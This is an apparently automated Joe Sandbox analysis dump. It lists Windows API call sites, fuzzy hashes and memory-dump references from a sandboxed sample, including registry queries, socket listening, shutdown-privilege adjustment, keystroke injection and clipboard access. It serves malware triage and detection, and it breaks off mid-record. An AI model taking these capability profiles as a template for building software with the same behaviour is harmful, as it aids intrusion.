                                            • Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
                                            • Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108931
                                          • _memset.LIBCMT ref: 00108946
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108965
                                          • GetLengthSid.ADVAPI32(?), ref: 00108976
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 001089B3
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001089CF
                                          • GetLengthSid.ADVAPI32(?), ref: 001089EC
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001089FB
                                          • HeapAlloc.KERNEL32(00000000), ref: 00108A02
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108A23
                                          • CopySid.ADVAPI32(00000000), ref: 00108A2A
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108A5B
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108A81
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108A95
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
                                          • Instruction ID: 68f8e07329aa9b3c69aba92c6aa0332823000da683f1250b7a396845f0f0c817
                                          • Opcode Fuzzy Hash: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
                                          • Instruction Fuzzy Hash: B4614975A00209FFDF01DFA5DC45AAEBB79FF48304F04812AF995A76A0DB719A04CB60
                                          APIs
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130B0C
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00130BAB
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00130C43
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00130E82
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00130E8F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: c62e32a14eda82b75f6517cd196d2e1d1f9f8807c10c1cc9822ac533cd0396b0
                                          • Instruction ID: 5cc7d936d4c5a97e47fed83b850bc213cac968cd2525e875797f9cfe73b975e2
                                          • Opcode Fuzzy Hash: c62e32a14eda82b75f6517cd196d2e1d1f9f8807c10c1cc9822ac533cd0396b0
                                          • Instruction Fuzzy Hash: 8DE14E35204211AFC715DF25C895E6ABBE9EF89714F04896DF48ADB2A2DB30ED01CB52
                                          APIs
                                          • __swprintf.LIBCMT ref: 00114451
                                          • __swprintf.LIBCMT ref: 0011445E
                                            • Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00114488
                                          • LoadResource.KERNEL32(?,00000000), ref: 00114494
                                          • LockResource.KERNEL32(00000000), ref: 001144A1
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 001144C1
                                          • LoadResource.KERNEL32(?,00000000), ref: 001144D3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 001144E2
                                          • LockResource.KERNEL32(?), ref: 001144EE
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0011454F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
                                          • Instruction ID: 9550ebb3b75f9e1c2c164cdae4f2d476757737e14e987bcd5d41bf719647af2f
                                          • Opcode Fuzzy Hash: 144fe6b38a3cfbc817aa208733ff2225cc43dd37859f612fd67ce9ce5663d6ff
                                          • Instruction Fuzzy Hash: 6F31CF7550121AABCB159FB1EC48EFB7BB9EF09701F004425FA06D6551DB70DAA1CBB0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
                                          • Instruction ID: 3f29f2d746f20369695180338fdee82ab81a093211845ae164dffceb7118ad8a
                                          • Opcode Fuzzy Hash: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
                                          • Instruction Fuzzy Hash: AB21F9356052109FDB02AF61EC49F6E77A8EF48720F018019FE06D76B2CB70AD90CB94
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0011FA83
                                          • FindClose.KERNEL32(00000000), ref: 0011FB96
                                            • Part of subcall function 000B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • Sleep.KERNEL32(0000000A), ref: 0011FAB3
                                          • _wcscmp.LIBCMT ref: 0011FAC7
                                          • _wcscmp.LIBCMT ref: 0011FAE2
                                          • FindNextFileW.KERNEL32(?,?), ref: 0011FB80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 2185952417-438819550
                                          • Opcode ID: 0fa745c7ba1218e54ad43fc66022b2142fb3c5874ce4b152f2ea54518337c092
                                          • Instruction ID: e2ade42805ee1e6d05daab6ec96888beb505d1970a7f5a172489845b5e8ef81e
                                          • Opcode Fuzzy Hash: 0fa745c7ba1218e54ad43fc66022b2142fb3c5874ce4b152f2ea54518337c092
                                          • Instruction Fuzzy Hash: F54183B590421A9FCF19DF64CC55AEEBBB4FF09350F14417AE814A32A1EB309E85CB50
                                          APIs
                                            • Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                            • Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                            • Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D
                                          • ExitWindowsEx.USER32(?,00000000), ref: 001157B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
                                          • Instruction ID: 23e73a7a5de72ec86b687bed0743592772a569ed867791be77af2c3775c7cedc
                                          • Opcode Fuzzy Hash: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
                                          • Instruction Fuzzy Hash: 5601F231754722EAE72C63A9DC8BBFB7659EB85740FA40139F953D60E2EB605C808160
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001269C7
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001269D6
                                          • bind.WSOCK32(00000000,?,00000010), ref: 001269F2
                                          • listen.WSOCK32(00000000,00000005), ref: 00126A01
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126A1B
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00126A2F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
                                          • Instruction ID: 1c82bef4c74ad4e25827f4872ee25e97989a8134881f4243adb93386aec8d47c
                                          • Opcode Fuzzy Hash: 34f8eada4be5967f78e0be7f8e44ee53f486936e0977654881cfef4fc90a0fc7
                                          • Instruction Fuzzy Hash: 812123346002119FCB00EF64DC89BAEB7B9EF49720F118558F956A73E2CB70AC50CB91
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 000B1DD6
                                          • GetSysColor.USER32(0000000F), ref: 000B1E2A
                                          • SetBkColor.GDI32(?,00000000), ref: 000B1E3D
                                            • Part of subcall function 000B166C: DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
                                          • Instruction ID: 63da7ea3087c894069471f06b3cb25cef5b12c6f23cd9373b3c64aa3082baa94
                                          • Opcode Fuzzy Hash: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
                                          • Instruction Fuzzy Hash: 01A15975109444BEDB3CAB6A9C69EFF39DDDB46301FA4011AF402EA1D6DB20DD41C2B6
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011C329
                                          • _wcscmp.LIBCMT ref: 0011C359
                                          • _wcscmp.LIBCMT ref: 0011C36E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011C37F
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0011C3AF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 39995a3ce20db51f76815ec508472ec34f8baf8788adcd78b0fd632525306978
                                          • Instruction ID: d8376406b2db6e711698d5c5bf88a51d260277b6291790aa3bc8aec8d36a5df4
                                          • Opcode Fuzzy Hash: 39995a3ce20db51f76815ec508472ec34f8baf8788adcd78b0fd632525306978
                                          • Instruction Fuzzy Hash: CC517C756046029FD718DF68D490EEAB3E4FF49314F10462DF96A877A2DB30AD44CB91
                                          APIs
                                            • Part of subcall function 00128475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00126E89
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126EB2
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00126EEB
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126EF8
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00126F0C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
                                          • Instruction ID: 50e3dec3c7d54fc1fd948515d97e162cd96f4cdae6bfe33fc650f949439c772a
                                          • Opcode Fuzzy Hash: e082ff95d2bb50441558cb3bfd476f4acb045825ef51b03c4d38ba6e9412492e
                                          • Instruction Fuzzy Hash: BC41D175A00610AFDB14AF64DC86FBE77A8DF08710F058458FA45AB3D3DB749E008BA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
                                          • Instruction ID: 5eaf106c6e0d08699f809bcbf9eccac138347e790e58b40c380ee90e75368a33
                                          • Opcode Fuzzy Hash: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
                                          • Instruction Fuzzy Hash: 281157323009119FE7221F268C80BAE7B9AFF48B20F014129F846D7242CB30ED01CAE0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
                                          • Instruction ID: 1fe85b973448a8c92c1902fe447e812027e100bad6d2158ad81b1b513a01590e
                                          • Opcode Fuzzy Hash: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
                                          • Instruction Fuzzy Hash: 9BD0127280821CEAC7259A90CD44EFD737CEB08304F144052F706E2442DB358798BA22
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00121ED6,00000000), ref: 00122AAD
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00122AE4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 489876feb79893f4f58263e7cfcf2d8c59e68a5328fc5e01bc1e403e2de5510d
                                          • Instruction ID: 27f9751dbf5b70ad87a291b6238fac39b883b907a903f7f452f9ef52971ec624
                                          • Opcode Fuzzy Hash: 489876feb79893f4f58263e7cfcf2d8c59e68a5328fc5e01bc1e403e2de5510d
                                          • Instruction Fuzzy Hash: 8941E571600319BFEB20DE95EC85EBFB7ACEB40754F10401AF605A7A41DB709E919B60
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                          • GetLastError.KERNEL32 ref: 0010941D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: d9a0042a7bf114767b22a8b7a6713787230e0559ea124983509c9b186279e2ef
                                          • Instruction ID: 27e8fc2110d2542f6d11f1c57a190b79c533e06af99097d1cf5b2abd93b786af
                                          • Opcode Fuzzy Hash: d9a0042a7bf114767b22a8b7a6713787230e0559ea124983509c9b186279e2ef
                                          • Instruction Fuzzy Hash: 3A1191B1414305AFD728EF64EC85D6BB7BCFB48750B20852EF49997691EB70AC41CB60
                                          APIs
                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00114271
                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001142B2
                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001142BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID:
                                          • API String ID: 33631002-0
                                          • Opcode ID: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
                                          • Instruction ID: 2bd9f47075b6b2a1703691c29f8d0271c17295a4085ffe3e3d10049c2cea2aae
                                          • Opcode Fuzzy Hash: 080f7c2b7f86af4480d43bebe18fec28589dfba6424383d96ddafbc0d725ba20
                                          • Instruction Fuzzy Hash: 3E113075E01228BFDB148F95AC44BAFBBBCEB49B60F104165FD04E7290C6715A418BA1
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00114F45
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00114F5C
                                          • FreeSid.ADVAPI32(?), ref: 00114F6C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
                                          • Instruction ID: 652d8c5db39a5baac3a2885456c5236cae124e30b2cdfef1bd8dbe3402d5e527
                                          • Opcode Fuzzy Hash: c0d8501d2cfb2c538c37c5dcd8ecf234527ad697634241e2859c1a4c790bb2a0
                                          • Instruction Fuzzy Hash: 9EF04F7591130DBFDF04DFE4DC89AADB7BCEF08201F104469AA01E3590D7355A448B50
                                          APIs
                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00111B01
                                          • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00111B14
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
